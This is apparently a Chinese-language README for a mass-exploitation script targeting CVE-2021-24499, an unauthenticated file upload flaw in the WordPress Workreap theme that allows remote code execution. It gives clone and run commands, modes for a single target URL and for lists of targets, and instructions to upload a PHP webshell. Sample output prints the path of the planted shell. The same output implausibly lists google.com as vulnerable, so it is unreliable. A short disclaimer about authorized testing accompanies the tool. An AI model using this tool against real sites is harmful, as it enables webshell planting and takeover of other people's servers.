WordPress 主题 Workreap 2.2.2 - 未认证文件上传导致远程代码执行
一个功能强大且精准的大规模利用工具,针对 WordPress Workreap 主题中的 CVE-2021-24499 漏洞。该利用程序允许未经认证的文件上传,从而可能导致远程代码执行(RCE)。
CVE-2021-24499 是 WordPress Workreap 主题(2.2.2 及以下版本)中的一个严重漏洞,它允许未经认证的用户通过 workreap_award_temp_file_uploader AJAX 操作上传任意文件,包括 PHP 文件。这可能导致目标服务器上的远程代码执行(RCE)。
受影响版本: 包括 2.2.2 在内的所有版本
CVSS 评分: 严重(Critical)
curl 命令行工具opts.php 或 shell.php 文件(PHP WebShell)git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
chmod +x exploit.sh
opts.php 或 shell.php(你的 PHP WebShell)单个目标:
./exploit.sh -u http://target.com
多个目标(从文件中读取):
./exploit.sh -l targets.txt
显示帮助:
./exploit.sh --help
| Option | Description |
|---|---|
-u URL | 利用单个目标 URL |
-l FILE | 从文件利用多个目标(每行一个 URL) |
--help | 显示帮助菜单 |
创建一个文本文件,每行一个 URL:
http://target1.com
https://target2.com
http://target3.com
$ ./exploit.sh -u https://domain.com
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com/ >> VULNERABLE!
--> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php
$ ./exploit.sh -l targets.txt
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com >> NOT VULNERABLE!
https://www.google.com >> VULNERABLE!
https://www.domain.com >> NOT VULNERABLE!
https://google.com >> VULNERABLE!
此工具仅供教育和授权测试目的使用。
使用此工具即表示你同意仅将其用于合法的安全测试和研究目的。
作者: Jay Maranatha Hutajulu
本项目基于 MIT 许可证授权 - 有关详细信息,请参阅 LICENSE 文件。
欢迎提交贡献、问题和功能请求!请随时查看 issues 页面。
如果你觉得这个工具好用,请考虑给它一个 Star ⭐
请记住: 始终负责任且合乎道德地使用安全工具。祝你黑客之旅愉快!🚀